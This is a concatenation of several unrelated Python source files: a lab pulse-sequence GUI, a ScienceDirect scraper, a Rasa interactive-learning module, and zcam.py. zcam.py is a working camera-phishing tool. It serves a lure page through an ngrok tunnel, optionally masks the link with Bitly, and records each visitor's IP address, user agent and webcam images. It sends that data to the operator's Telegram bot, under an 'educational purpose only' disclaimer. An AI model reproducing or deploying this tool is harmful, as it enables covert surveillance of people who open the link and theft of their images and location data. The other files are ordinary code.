self.pb.pulser_pulse( name = 'P0', channel = self.p1_typ, start = self.p1_start, length = self.p1_length, \
phase_list = [ self.ph_1 ] )
if int( self.p2_length.split(' ')[0] ) != 0:
self.pb.pulser_pulse( name = 'P1', channel = self.p2_typ, start = self.p2_start, length = self.p2_length, \
phase_list = [ self.ph_2 ] )
if int( self.p3_length.split(' ')[0] ) != 0:
self.pb.pulser_pulse( name = 'P2', channel = self.p3_typ, start = self.p3_start, length = self.p3_length, \
phase_list = [ self.ph_3 ] )
if int( self.p4_length.split(' ')[0] ) != 0:
self.pb.pulser_pulse( name = 'P3', channel = self.p4_typ, start = self.p4_start, length = self.p4_length, \
phase_list = [ self.ph_4 ] )
if int( self.p5_length.split(' ')[0] ) != 0:
self.pb.pulser_pulse( name = 'P4', channel = self.p5_typ, start = self.p5_start, length = self.p5_length, \
phase_list = [ self.ph_5 ] )
if int( self.p6_length.split(' ')[0] ) != 0:
self.pb.pulser_pulse( name = 'P5', channel = self.p6_typ, start = self.p6_start, length = self.p6_length, \
phase_list = [ self.ph_6 ] )
if int( self.p7_length.split(' ')[0] ) != 0:
self.pb.pulser_pulse( name = 'P6', channel = self.p7_typ, start = self.p7_start, length = self.p7_length, \
phase_list = [ self.ph_7 ] )
else:
self.pb.pulser_repetition_rate( '10 Hz' )
self.Rep_rate.setValue(10)
# add q_switch_delay
self.p1_start = self.add_ns( int( self.remove_ns( self.p1_start ) ) + self.laser_q_switch_delay )
self.p3_start = self.add_ns( int( self.remove_ns( self.p3_start ) ) + self.laser_q_switch_delay )
self.p4_start = self.add_ns( int( self.remove_ns( self.p4_start ) ) + self.laser_q_switch_delay )
self.p5_start = self.add_ns( int( self.remove_ns( self.p5_start ) ) + self.laser_q_switch_delay )
self.p6_start = self.add_ns( int( self.remove_ns( self.p6_start ) ) + self.laser_q_switch_delay )
self.p7_start = self.add_ns( int( self.remove_ns( self.p7_start ) ) + self.laser_q_switch_delay )
if int( self.p1_length.split(' ')[0] ) != 0:
self.pb.pulser_pulse( name = 'P0', channel = self.p1_typ, start = self.p1_start, length = self.p1_length, \
phase_list = [ self.ph_1 ] )
if int( self.p2_length.split(' ')[0] ) != 0:
self.pb.pulser_pulse( name = 'P1', channel = self.p2_typ, start = self.p2_start, length = self.p2_length, \
phase_list = [ self.ph_2 ] )
if int( self.p3_length.split(' ')[0] ) != 0:
self.pb.pulser_pulse( name = 'P2', channel = self.p3_typ, start = self.p3_start, length = self.p3_length, \
phase_list = [ self.ph_3 ] )
if int( self.p4_length.split(' ')[0] ) != 0:
self.pb.pulser_pulse( name = 'P3', channel = self.p4_typ, start = self.p4_start, length = self.p4_length, \
phase_list = [ self.ph_4 ] )
if int( self.p5_length.split(' ')[0] ) != 0:
self.pb.pulser_pulse( name = 'P4', channel = self.p5_typ, start = self.p5_start, length = self.p5_length, \
phase_list = [ self.ph_5 ] )
if int( self.p6_length.split(' ')[0] ) != 0:
self.pb.pulser_pulse( name = 'P5', channel = self.p6_typ, start = self.p6_start, length = self.p6_length, \
phase_list = [ self.ph_6 ] )
if int( self.p7_length.split(' ')[0] ) != 0:
self.pb.pulser_pulse( name = 'P6', channel = self.p7_typ, start = self.p7_start, length = self.p7_length, \
phase_list = [ self.ph_7 ] )
self.errors.appendPlainText( '165 us (the LASER Q-switch delay) is added to all the pulses except the LASER pulse' )
# before adding pulse phases
##self.pb.pulser_update()
self.pb.pulser_next_phase()
# the next line gives rise to a bug with the field controller (FC)
#self.bh15.magnet_field( self.mag_field )
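# Editorial sketch (not part of the original class): the pulse timings above are
# handled as strings of the form '<number> ns', which is why the code keeps
# converting with self.remove_ns() / self.add_ns(). Assuming those helpers behave
# roughly like the simplified stand-ins below:
#
#     def remove_ns(text):      # '200 ns' -> '200'
#         return text.split(' ')[0]
#
#     def add_ns(value):        # 216 -> '216 ns'
#         return str(value) + ' ns'
#
# adding the Q-switch delay is plain integer arithmetic on the numeric part,
# e.g. add_ns(int(remove_ns('200 ns')) + 165) == '365 ns'.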
def update(self):
"""
A function to run pulses
"""
# TEST RUN
self.errors.clear()
self.parent_conn, self.child_conn = Pipe()
# a process for running test
self.test_process = Process( target = self.pulser_test, args = ( self.child_conn, 'test', ) )
self.test_process.start()
# give the test process time to finish
time.sleep( 0.1 )
#print( self.test_process.exitcode )
if self.test_process.exitcode == 0:
self.test_process.join()
# RUN
self.pb.pulser_clear()
self.pb.pulser_test_flag('None')
self.bh15.magnet_setup( self.mag_field, 0.5 )
self.pulse_sequence()
#self.errors.appendPlainText( str( ans ) )
self.errors.appendPlainText( self.pb.pulser_pulse_list() )
else:
self.test_process.join()
self.pb.pulser_stop()
self.errors.appendPlainText( 'Incorrect pulse setting. Check that:\n' + \
'1. Pulses do not overlap\n' + \
'2. The distance between MW pulses is more than 40 ns\n' + \
'3. Pulses are at least 12 ns long\n' + \
'4. The Field Controller is not stuck\n' + \
'5. The LASER pulse is not 208-232; 152-182; 102-126; or <76 ns from the first MW pulse\n' + \
'\nPulser is stopped\n')
def pulser_test(self, conn, flag):
"""
Test run
"""
self.pb.pulser_clear()
self.pb.pulser_test_flag( flag )
self.pulse_sequence()
def turn_off(self):
"""
A function to turn off the program.
"""
self.quit()
def help(self):
"""
A function to open the documentation.
"""
pass
def main():
"""
A function to run the main window of the program.
"""
app = QtWidgets.QApplication(sys.argv)
main = MainWindow()
main.show()
sys.exit(app.exec_())
if __name__ == '__main__':
main()
|
journal_scraper.py
|
import logging
from get_sd_ou.classUtil import Journal, JournalsSearch, Volume, Article
from queue import Queue
from threading import Thread, current_thread, Lock
from get_sd_ou.databaseUtil import insert_article_data, init_db
from get_sd_ou.config import Config
def scrape_and_save_article(article_url_queue, mysql_connection):
first_url = article_url_queue.get()
article_url_queue.put(first_url)
while not article_url_queue.empty():
url = article_url_queue.get()
article_data, article_hash = scrape_article_url(url)
if article_data is not None:
save_article_to_db(article_data, mysql_connection)
article_url_queue.task_done()
add_to_persistance(article_hash, mysql_connection)
logger.info(f"[{current_thread().name}] - Article scraped and saved - url = {url}")
else:
logger.info(f"[{current_thread().name}] skipped article: {url}")
def scrape_article_url(url):
article = Article(url=url)
article_hash = str(article).strip()
if article_hash not in visited:
article_data = article.get_article_data()
logger.debug(f"thread: ({current_thread().name})[journal_scraper]-[scrape_article_url] | {url}")
return article_data, article_hash
return None, None
def save_article_to_db(article_data, db_connection):
article_id = insert_article_data(**article_data, cnx=db_connection)
logger.debug(f"thread: ({current_thread().name})[journal_scraper]-[save_article_to_db] | {article_id}")
def get_node_children(node, **kwargs):
if node == "ROOT":
yield from iterate_journal_searches(kwargs.get('start_letter', 'a'), kwargs.get('end_letter', 'z'))
elif isinstance(node, JournalsSearch):
yield from node.iterate_journals()
elif isinstance(node, Journal):
yield from node.iterate_volumes()
elif isinstance(node, Volume):
articles = node.get_articles()
for article in articles:
yield article
else:
raise Exception(f"Invalid node - ({type(node)}) - {node}")
def iterate_journal_searches(start_letter="a", endletter="z"):
while start_letter <= endletter:
journal_search = JournalsSearch(letter=start_letter)
while journal_search:
yield journal_search
journal_search = journal_search.get_next_page()
start_letter = chr(ord(start_letter)+1)
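# Editorial sketch (not part of the original module): the letter-advancing loop
# above, with JournalsSearch stubbed out, reduces to a simple alphabet walk:
#
#     def letters(start="a", end="c"):
#         while start <= end:
#             yield start
#             start = chr(ord(start) + 1)
#
#     list(letters())  # -> ['a', 'b', 'c']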
def deep_first_search_for_articles(self_node, article_url_queue, mysql_connection, **kwargs):
if str(self_node) not in visited:
node_children = get_node_children(self_node, **kwargs)
if isinstance(self_node, Volume): # deepest node of tree before articles is Volume
articles = list(node_children)
for article in articles:
add_to_persistance(str(article).strip(), mysql_connection)
# list(map(article_url_queue.put, articles))
else:
for child in node_children:
deep_first_search_for_articles(self_node=child, article_url_queue=article_url_queue, mysql_connection=mysql_connection, **kwargs)
add_to_persistance(str(self_node).strip(), mysql_connection)
logger.info(f"[{current_thread().name}] Got node children: [{type(self_node)}] {str(self_node).strip()}")
else:
logger.info(f"[{current_thread().name}] skipped node: {str(self_node)}")
def init_persistance():
mysql_connection = init_db()
mysql_cursor = mysql_connection.cursor()
mysql_cursor.execute("CREATE TABLE IF NOT EXISTS sciencedirect.visited (hash VARCHAR(512) UNIQUE);")
mysql_connection.commit()
print("persistence table ready")
return mysql_connection
def add_to_persistance(item, cnx):
lock.acquire()
visited.add(str(item))
lock.release()
cursor = cnx.cursor()
# res = cursor.execute(f"INSERT INTO sciencedirect.visited (hash) VALUES ('%s');", str(item))
res = cursor.execute(f"INSERT IGNORE INTO sciencedirect.visited VALUES (%s);", (str(item), ))
cnx.commit()
def write_visited(write_set, mysql_connection=None):
res = None
cursor = mysql_connection.cursor()
for i in write_set:
res = cursor.execute('INSERT INTO sciencedirect.visited (hash) VALUES (%s);', (str(i),))
mysql_connection.commit()
print(res)
def load_visited(mysql_connection=None):
cursor = mysql_connection.cursor()
cursor.execute('SELECT hash FROM sciencedirect.visited;')
res = [i[0] for i in cursor.fetchall()]
return set(res)
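# Editorial sketch: the helpers above implement a simple "visited hashes"
# persistence layer. A self-contained equivalent using the standard-library
# sqlite3 module (hypothetical; the project itself uses MySQL) would be:
#
#     import sqlite3
#     cnx = sqlite3.connect(":memory:")
#     cnx.execute("CREATE TABLE IF NOT EXISTS visited (hash TEXT UNIQUE);")
#     cnx.execute("INSERT OR IGNORE INTO visited VALUES (?);", ("some-hash",))
#     cnx.commit()
#     loaded = {row[0] for row in cnx.execute("SELECT hash FROM visited;")}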
if __name__ == "__main__":
logger = logging.getLogger('mainLogger')
logger.setLevel(Config.LOG_LEVEL)
mysql_connection = init_persistance()
file_data = load_visited(mysql_connection)
visited = file_data if file_data else set()
lock = Lock()
article_queue = Queue(maxsize=Config.QUEUE_MAX_SIZE)
start_letter = Config.START_LETTER
end_letter = Config.END_LETTER
search_thread = Thread(target=deep_first_search_for_articles,
args=("ROOT", article_queue, mysql_connection), kwargs={"start_letter":start_letter, "end_letter":end_letter})
try:
search_thread.start()
search_thread.join()
# for i in range(Config.THREADS_COUNT):
# mysql_connection = init_persistance()
# t = Thread(target=scrape_and_save_article, args=(article_queue, mysql_connection))
# t.start()
# article_queue.join()
except Exception as e:
print(e)
print("EXCEPTION")
|
zcam.py
|
#!/usr/bin/python3
from telebot import types
import telebot
from constraints import API_KEY, BITLY_ACCESS_TOKEN, ngrok_auth_token
import threading
from flask import Flask, render_template, request
from datetime import datetime
import base64
import os
from pyngrok import ngrok
import pyfiglet
import logging
import pyshorteners
import requests
try:
# telegram
bot = telebot.TeleBot(API_KEY, parse_mode=None)
# bitly
s = pyshorteners.Shortener(api_key=BITLY_ACCESS_TOKEN)
# colors
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKCYAN = '\033[96m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
# banner
result = pyfiglet.figlet_format("Z-CAM")
print(f"{bcolors.OKBLUE}{result}{bcolors.ENDC}")
print(f"\t\t\t {bcolors.BOLD}Github: @sankethj{bcolors.ENDC}")
print("")
# disable unwanted logs
log = logging.getLogger('werkzeug')
log.setLevel(logging.ERROR)
os.environ["FLASK_ENV"] = "development"
app = Flask(__name__)
app.debug = False
fport = 5000
# webhook port
PORT = int(os.environ.get('PORT', 5000))
# ngrok auth-token
ngrok.set_auth_token(ngrok_auth_token)
public_url = ngrok.connect(fport).public_url
final_ngrok = public_url[:4] + "s" + public_url[4:]
# url shorten or not
shorten = input(f"{bcolors.WARNING} Do you want to use Bitly to shorten url link? ['y' or 'n']: {bcolors.ENDC}")
if shorten.lower() in ('y', 'yes'):
final_ngrok = s.bitly.short(final_ngrok)
# telegram bot building
tgbot = input(f"{bcolors.WARNING} Do you want telegram bot support? ['y' or 'n']: {bcolors.ENDC}")
if tgbot.lower() in ('y', 'yes'):
@bot.message_handler(commands=["link"])
def send_link_and_image(msg):
bot.reply_to(msg, final_ngrok)
global user_id
user_id = msg.chat.id
@bot.message_handler(commands=["shorten_link"])
def send_shortend_link(msg):
s_final_ngrok = s.bitly.short(final_ngrok)
bot.reply_to(msg, s_final_ngrok)
global user_id
user_id = msg.chat.id
@bot.message_handler(commands=["start"])
def send_start_message(msg):
bot.reply_to(msg,"Welcome.....ZCam tool is for Eductaional purpose only. Use /help for more info. Support @Team_ETF for more..... JOIN: https://youtube.com/channel/UCJnx0yDhcTLWM3ZrAtSvaIw")
global user_id
user_id = msg.chat.id
@bot.message_handler(commands=["help"])
def send_help_message(msg):
bot.reply_to(msg,"Use /menu for menu window. Use /link to get ngrok link. Use /shorten_link to get bitly masked link.")
global user_id
user_id = msg.chat.id
@bot.message_handler(commands=["menu"])
def show_menu_page(msg):
markup = types.ReplyKeyboardMarkup(row_width=1)
btn1 = types.KeyboardButton("/start")
btn2 = types.KeyboardButton("/link")
btn3 = types.KeyboardButton("/shorten_link")
btn4 = types.KeyboardButton("/help")
markup.add(btn1,btn2,btn3,btn4)
bot.send_message(chat_id=msg.chat.id, text="Choose from menu", reply_markup=markup)
global user_id
user_id = msg.chat.id
else:
pass
#final ngrok link
print(f" * ngrok tunnel link -> {bcolors.OKCYAN}{final_ngrok}{bcolors.ENDC}")
app.config["BASE_URL"] = public_url
# flask
@app.route("/",methods=['POST','GET'])
def home():
# get request
if request.method == 'GET':
now = str(datetime.now())
req = requests.get('http://localhost:4040/api/requests/http').json()
user_agent = req['requests'][0]['request']['headers']['User-Agent'][0]
ip_address = req['requests'][0]['request']['headers']['X-Forwarded-For'][0]
# writing file
file1 = open('myfile.txt', 'a')
file1.write("Date and Time:\t")
file1.write(str(now))
file1.write("\nIP:\t")
file1.write(str(ip_address))
file1.write("\nUser-Agent:\t")
file1.write(str(user_agent))
file1.write("\n\n")
file1.close()
# sending log message to telegram bot
log_msg = "Time: "+ str(now) +" "+"IP_ADDRESS: "+ str(ip_address) +" "+"USER-AGENT: "+ str(user_agent)
to_url2 = "https://api.telegram.org/bot"+ API_KEY +"/sendMessage?chat_id="+ str(user_id) +"&text="+ str(log_msg)
requests.get(to_url2)
print(f"{now} \t {bcolors.OKCYAN}{ip_address}{bcolors.ENDC} \t {user_agent}\t")
# post request
elif request.method == 'POST':
now = str(datetime.now())
# setting path to save file in capture dir
save_path = 'capture'
file_name = 'img_'+now+'.png'
completeName = os.path.join(save_path, file_name)
# requesting base64 image data
req_data = request.get_json()
encoded = req_data['canvasData']
# writing file
file2 = open(completeName, 'wb')
data = base64.b64decode(encoded)
file2.write(data)
file2.close()
print(f"{bcolors.OKGREEN}[{bcolors.ENDC}+{bcolors.OKGREEN}] Cam image recieved.{bcolors.FAIL} \n ")
# sending photo to telegram bot
data = {"chat_id": user_id, "caption": ""}
to_url = 'https://api.telegram.org/bot{}/sendPhoto'.format(API_KEY)
with open(completeName, "rb") as image_file:
requests.post(to_url, data=data, files={"photo": image_file})
return render_template("saycheese.html")
# threading to run flask with pyngrok smoothly
threading.Thread(target=app.run, kwargs={"use_reloader": False}).start()
bot.polling()
except KeyboardInterrupt:
print(f"{bcolors.FAIL} Ending task.....\n")
|
interactive.py
|
import asyncio
import logging
import os
import tempfile
import textwrap
import uuid
from functools import partial
from multiprocessing import Process
from typing import (
Any, Callable, Dict, List, Optional, Text, Tuple, Union)
import numpy as np
from aiohttp import ClientError
from colorclass import Color
from sanic import Sanic, response
from sanic.exceptions import NotFound
from terminaltables import AsciiTable, SingleTable
import questionary
import rasa.cli.utils
from questionary import Choice, Form, Question
from rasa.cli import utils as cliutils
from rasa.core import constants, events, run, train, utils
from rasa.core.actions.action import ACTION_LISTEN_NAME, default_action_names
from rasa.core.channels import UserMessage
from rasa.core.channels.channel import button_to_string, element_to_string
from rasa.core.constants import (
DEFAULT_SERVER_FORMAT, DEFAULT_SERVER_PORT, DEFAULT_SERVER_URL,
REQUESTED_SLOT)
from rasa.core.domain import Domain
from rasa.core.events import (
ActionExecuted, BotUttered, Event, Restarted, UserUttered)
from rasa.core.interpreter import (
INTENT_MESSAGE_PREFIX,
NaturalLanguageInterpreter)
from rasa.core.trackers import EventVerbosity
from rasa.core.training import visualization
from rasa.core.training.structures import Story
from rasa.core.training.visualization import (
VISUALIZATION_TEMPLATE_PATH, visualize_neighborhood)
from rasa.core.utils import AvailableEndpoints, EndpointConfig
# noinspection PyProtectedMember
from rasa_nlu.training_data.loading import _guess_format, load_data
from rasa_nlu.training_data.message import Message
# WARNING: This command line UI is using an external library
# communicating with the shell - these functions are hard to test
# automatically. If you change anything in here, please make sure to
# run the interactive learning and check if your part of the "ui"
# still works.
logger = logging.getLogger(__name__)
MAX_VISUAL_HISTORY = 3
PATHS = {"stories": "data/stories.md",
"nlu": "data/nlu.md",
"backup": "data/nlu_interactive.md",
"domain": "domain.yml"}
# choose other intent, making sure this doesn't clash with an existing intent
OTHER_INTENT = uuid.uuid4().hex
OTHER_ACTION = uuid.uuid4().hex
class RestartConversation(Exception):
"""Exception used to break out the flow and restart the conversation."""
pass
class ForkTracker(Exception):
"""Exception used to break out the flow and fork at a previous step.
The tracker will be reset to the selected point in the past and the
conversation will continue from there."""
pass
class UndoLastStep(Exception):
"""Exception used to break out the flow and undo the last step.
The last step is either the most recent user message or the most
recent action run by the bot."""
pass
class Abort(Exception):
"""Exception used to abort the interactive learning and exit."""
pass
async def send_message(
endpoint: EndpointConfig,
sender_id: Text,
message: Text,
parse_data: Optional[Dict[Text, Any]] = None
) -> Dict[Text, Any]:
"""Send a user message to a conversation."""
payload = {
"sender": UserUttered.type_name,
"message": message,
"parse_data": parse_data
}
return await endpoint.request(json=payload,
method="post",
subpath="/conversations/{}/messages"
"".format(sender_id))
async def request_prediction(
endpoint: EndpointConfig,
sender_id: Text
) -> Dict[Text, Any]:
"""Request the next action prediction from core."""
return await endpoint.request(method="post",
subpath="/conversations/{}/predict".format(
sender_id))
async def retrieve_domain(endpoint: EndpointConfig) -> Dict[Text, Any]:
"""Retrieve the domain from core."""
return await endpoint.request(method="get",
subpath="/domain",
headers={"Accept": "application/json"})
async def retrieve_status(endpoint: EndpointConfig) -> Dict[Text, Any]:
"""Retrieve the status from core."""
return await endpoint.request(method="get", subpath="/status")
async def retrieve_tracker(
endpoint: EndpointConfig,
sender_id: Text,
verbosity: EventVerbosity = EventVerbosity.ALL
) -> Dict[Text, Any]:
"""Retrieve a tracker from core."""
path = "/conversations/{}/tracker?include_events={}".format(
sender_id, verbosity.name)
return await endpoint.request(method="get",
subpath=path,
headers={"Accept": "application/json"})
async def send_action(
endpoint: EndpointConfig,
sender_id: Text,
action_name: Text,
policy: Optional[Text] = None,
confidence: Optional[float] = None,
is_new_action: bool = False
) -> Dict[Text, Any]:
"""Log an action to a conversation."""
payload = ActionExecuted(action_name, policy, confidence).as_dict()
subpath = "/conversations/{}/execute".format(sender_id)
try:
return await endpoint.request(json=payload,
method="post",
subpath=subpath)
except ClientError:
if is_new_action:
warning_questions = questionary.confirm(
"WARNING: You have created a new action: '{}', "
"which was not successfully executed. "
"If this action does not return any events, "
"you do not need to do anything. "
"If this is a custom action which returns events, "
"you are recommended to implement this action "
"in your action server and try again."
"".format(action_name))
await _ask_questions(warning_questions, sender_id, endpoint)
payload = ActionExecuted(action_name).as_dict()
return await send_event(endpoint, sender_id, payload)
else:
logger.error("failed to execute action!")
raise
async def send_event(
endpoint: EndpointConfig,
sender_id: Text,
evt: Dict[Text, Any]
) -> Dict[Text, Any]:
"""Log an event to a conversation."""
subpath = "/conversations/{}/tracker/events".format(sender_id)
return await endpoint.request(json=evt,
method="post",
subpath=subpath)
async def replace_events(
endpoint: EndpointConfig,
sender_id: Text,
evts: List[Dict[Text, Any]]
) -> Dict[Text, Any]:
"""Replace all the events of a conversation with the provided ones."""
subpath = "/conversations/{}/tracker/events".format(sender_id)
return await endpoint.request(json=evts,
method="put",
subpath=subpath)
async def send_finetune(
endpoint: EndpointConfig,
evts: List[Dict[Text, Any]]
) -> Dict[Text, Any]:
"""Finetune a core model on the provided additional training samples."""
return await endpoint.request(json=evts,
method="post",
subpath="/finetune")
def format_bot_output(
message: Dict[Text, Any]
) -> Text:
"""Format a bot response to be displayed in the history table."""
# First, add text to output
output = message.get("text") or ""
# Then, append all additional items
data = message.get("data", {})
if not data:
return output
if data.get("image"):
output += "\nImage: " + data.get("image")
if data.get("attachment"):
output += "\nAttachment: " + data.get("attachment")
if data.get("buttons"):
output += "\nButtons:"
for idx, button in enumerate(data.get("buttons")):
button_str = button_to_string(button, idx)
output += "\n" + button_str
if data.get("elements"):
output += "\nElements:"
for idx, element in enumerate(data.get("elements")):
element_str = element_to_string(element, idx)
output += "\n" + element_str
if data.get("quick_replies"):
output += "\nQuick replies:"
for idx, element in enumerate(data.get("quick_replies")):
element_str = element_to_string(element, idx)
output += "\n" + element_str
return output
def latest_user_message(
evts: List[Dict[Text, Any]]
) -> Optional[Dict[Text, Any]]:
"""Return most recent user message."""
for i, e in enumerate(reversed(evts)):
if e.get("event") == UserUttered.type_name:
return e
return None
def all_events_before_latest_user_msg(
evts: List[Dict[Text, Any]]
) -> List[Dict[Text, Any]]:
"""Return all events that happened before the most recent user message."""
for i, e in enumerate(reversed(evts)):
if e.get("event") == UserUttered.type_name:
return evts[:-(i + 1)]
return evts
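# Example (editorial, hypothetical event dicts): given
#     evts = [{"event": "action"}, {"event": "user"}, {"event": "bot"}]
# the helper above returns [{"event": "action"}] - the most recent user message
# and everything after it are dropped; if no user message exists, the full list
# is returned unchanged.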
async def _ask_questions(
questions: Union[Form, Question],
sender_id: Text,
endpoint: EndpointConfig,
is_abort: Callable[[Dict[Text, Any]], bool] = lambda x: False
) -> Any:
"""Ask the user a question, if Ctrl-C is pressed provide user with menu."""
should_retry = True
answers = {}
while should_retry:
answers = questions.ask()
if answers is None or is_abort(answers):
should_retry = await _ask_if_quit(sender_id, endpoint)
else:
should_retry = False
return answers
def _selection_choices_from_intent_prediction(
predictions: List[Dict[Text, Any]]
) -> List[Dict[Text, Text]]:
""""Given a list of ML predictions create a UI choice list."""
sorted_intents = sorted(predictions,
key=lambda k: (-k['confidence'], k['name']))
choices = []
for p in sorted_intents:
name_with_confidence = "{:03.2f} {:40}".format(p.get("confidence"),
p.get("name"))
choice = {
"name": name_with_confidence,
"value": p.get("name")
}
choices.append(choice)
return choices
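# Example (editorial, hypothetical values): predictions such as
#     [{"name": "greet", "confidence": 0.2}, {"name": "bye", "confidence": 0.9}]
# are sorted by descending confidence (ties broken alphabetically by name) and
# rendered as choices like {"name": "0.90 bye ...", "value": "bye"}.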
async def _request_free_text_intent(
sender_id: Text,
endpoint: EndpointConfig
) -> Text:
question = questionary.text("Please type the intent name")
return await _ask_questions(question, sender_id, endpoint)
async def _request_free_text_action(
sender_id: Text,
endpoint: EndpointConfig
) -> Text:
question = questionary.text("Please type the action name")
return await _ask_questions(question, sender_id, endpoint)
async def _request_selection_from_intent_list(
intent_list: List[Dict[Text, Text]],
sender_id: Text,
endpoint: EndpointConfig
) -> Text:
question = questionary.select("What intent is it?", choices=intent_list)
return await _ask_questions(question, sender_id, endpoint)
async def _request_fork_point_from_list(
forks: List[Dict[Text, Text]],
sender_id: Text,
endpoint: EndpointConfig
) -> Text:
question = questionary.select(
"Before which user message do you want to fork?",
choices=forks)
return await _ask_questions(question, sender_id, endpoint)
async def _request_fork_from_user(
sender_id,
endpoint
) -> Optional[List[Dict[Text, Any]]]:
"""Take in a conversation and ask at which point to fork the conversation.
Returns the list of events that should be kept. Forking means the
conversation will be reset and continued from this previous point."""
tracker = await retrieve_tracker(endpoint, sender_id,
EventVerbosity.AFTER_RESTART)
choices = []
for i, e in enumerate(tracker.get("events", [])):
if e.get("event") == UserUttered.type_name:
choices.append({"name": e.get("text"), "value": i})
fork_idx = await _request_fork_point_from_list(list(reversed(choices)),
sender_id,
endpoint)
if fork_idx is not None:
return tracker.get("events", [])[:int(fork_idx)]
else:
return None
async def _request_intent_from_user(
latest_message,
intents,
sender_id,
endpoint
) -> Dict[Text, Any]:
"""Take in latest message and ask which intent it should have been.
Returns the intent dict that has been selected by the user."""
predictions = latest_message.get("parse_data",
{}).get("intent_ranking", [])
predicted_intents = {p["name"] for p in predictions}
for i in intents:
if i not in predicted_intents:
predictions.append({"name": i, "confidence": 0.0})
# convert intents to ui list and add <other> as a free text alternative
choices = ([{"name": "<create_new_intent>", "value": OTHER_INTENT}] +
_selection_choices_from_intent_prediction(predictions))
intent_name = await _request_selection_from_intent_list(choices,
sender_id,
endpoint)
if intent_name == OTHER_INTENT:
intent_name = await _request_free_text_intent(sender_id, endpoint)
return {"name": intent_name, "confidence": 1.0}
# returns the selected intent with the original probability value
return next((x for x in predictions if x["name"] == intent_name), None)
async def _print_history(sender_id: Text, endpoint: EndpointConfig) -> None:
"""Print information about the conversation for the user."""
tracker_dump = await retrieve_tracker(endpoint, sender_id,
EventVerbosity.AFTER_RESTART)
evts = tracker_dump.get("events", [])
table = _chat_history_table(evts)
slot_strs = _slot_history(tracker_dump)
print("------")
print("Chat History\n")
print(table)
if slot_strs:
print("\n")
print("Current slots: \n\t{}\n".format(", ".join(slot_strs)))
print("------")
def _chat_history_table(evts: List[Dict[Text, Any]]) -> Text:
"""Create a table containing bot and user messages.
Also includes additional information, like any events and
prediction probabilities."""
def wrap(txt, max_width):
return "\n".join(textwrap.wrap(txt, max_width,
replace_whitespace=False))
def colored(txt, color):
return "{" + color + "}" + txt + "{/" + color + "}"
def format_user_msg(user_evt, max_width):
_parsed = user_evt.get('parse_data', {})
_intent = _parsed.get('intent', {}).get("name")
_confidence = _parsed.get('intent', {}).get("confidence", 1.0)
_md = _as_md_message(_parsed)
_lines = [
colored(wrap(_md, max_width), "hired"),
"intent: {} {:03.2f}".format(_intent, _confidence)
]
return "\n".join(_lines)
def bot_width(_table: AsciiTable) -> int:
return _table.column_max_width(1)
def user_width(_table: AsciiTable) -> int:
return _table.column_max_width(3)
def add_bot_cell(data, cell):
data.append([len(data), Color(cell), "", ""])
def add_user_cell(data, cell):
data.append([len(data), "", "", Color(cell)])
# prints the historical interactions between the bot and the user,
# to help with correctly identifying the action
table_data = [
["# ",
Color(colored('Bot ', 'autoblue')),
" ",
Color(colored('You ', 'hired'))],
]
table = SingleTable(table_data, 'Chat History')
bot_column = []
for idx, evt in enumerate(evts):
if evt.get("event") == ActionExecuted.type_name:
bot_column.append(colored(evt['name'], 'autocyan'))
if evt['confidence'] is not None:
bot_column[-1] += (
colored(" {:03.2f}".format(evt['confidence']),
'autowhite'))
elif evt.get("event") == UserUttered.type_name:
if bot_column:
text = "\n".join(bot_column)
add_bot_cell(table_data, text)
bot_column = []
msg = format_user_msg(evt, user_width(table))
add_user_cell(table_data, msg)
elif evt.get("event") == BotUttered.type_name:
wrapped = wrap(format_bot_output(evt), bot_width(table))
bot_column.append(colored(wrapped, 'autoblue'))
else:
e = Event.from_parameters(evt)
if e.as_story_string():
bot_column.append(wrap(e.as_story_string(), bot_width(table)))
if bot_column:
text = "\n".join(bot_column)
add_bot_cell(table_data, text)
table.inner_heading_row_border = False
table.inner_row_border = True
table.inner_column_border = False
table.outer_border = False
table.justify_columns = {0: 'left', 1: 'left', 2: 'center', 3: 'right'}
return table.table
def _slot_history(tracker_dump: Dict[Text, Any]) -> List[Text]:
"""Create an array of slot representations to be displayed."""
slot_strs = []
for k, s in tracker_dump.get("slots").items():
colored_value = cliutils.wrap_with_color(str(s),
rasa.cli.utils.bcolors.WARNING)
slot_strs.append("{}: {}".format(k, colored_value))
return slot_strs
async def _write_data_to_file(sender_id: Text, endpoint: EndpointConfig):
"""Write stories and nlu data to file."""
story_path, nlu_path, domain_path = _request_export_info()
tracker = await retrieve_tracker(endpoint, sender_id)
evts = tracker.get("events", [])
await _write_stories_to_file(story_path, evts)
await _write_nlu_to_file(nlu_path, evts)
await _write_domain_to_file(domain_path, evts, endpoint)
logger.info("Successfully wrote stories and NLU data")
async def _ask_if_quit(sender_id: Text, endpoint: EndpointConfig) -> bool:
"""Display the exit menu.
Return `True` if the previous question should be retried."""
answer = questionary.select(
message="Do you want to stop?",
choices=[Choice("Continue", "continue"),
Choice("Undo Last", "undo"),
Choice("Fork", "fork"),
Choice("Start Fresh", "restart"),
Choice("Export & Quit", "quit")]).ask()
if not answer or answer == "quit":
# this is also the default answer if the user presses Ctrl-C
await _write_data_to_file(sender_id, endpoint)
raise Abort()
elif answer == "continue":
# in this case we will just return, and the original
# question will get asked again
return True
elif answer == "undo":
raise UndoLastStep()
elif answer == "fork":
raise ForkTracker()
elif answer == "restart":
raise RestartConversation()
async def _request_action_from_user(
predictions: List[Dict[Text, Any]],
sender_id: Text, endpoint: EndpointConfig
) -> Tuple[Text, bool]:
"""Ask the user to correct an action prediction."""
await _print_history(sender_id, endpoint)
choices = [{"name": "{:03.2f} {:40}".format(a.get("score"),
a.get("action")),
"value": a.get("action")}
for a in predictions]
choices = ([{"name": "<create new action>", "value": OTHER_ACTION}] +
choices)
question = questionary.select("What is the next action of the bot?",
choices)
action_name = await _ask_questions(question, sender_id, endpoint)
is_new_action = action_name == OTHER_ACTION
if is_new_action:
action_name = await _request_free_text_action(sender_id, endpoint)
print("Thanks! The bot will now run {}.\n".format(action_name))
return action_name, is_new_action
def _request_export_info() -> Tuple[Text, Text, Text]:
"""Request file path and export stories & nlu data to that path"""
# export training data and quit
questions = questionary.form(
export_stories=questionary.text(
message="Export stories to (if file exists, this "
"will append the stories)",
default=PATHS["stories"]),
export_nlu=questionary.text(
message="Export NLU data to (if file exists, this will "
"merge learned data with previous training examples)",
default=PATHS["nlu"]),
export_domain=questionary.text(
message="Export domain file to (if file exists, this "
"will be overwritten)",
default=PATHS["domain"]),
)
answers = questions.ask()
if not answers:
raise Abort()
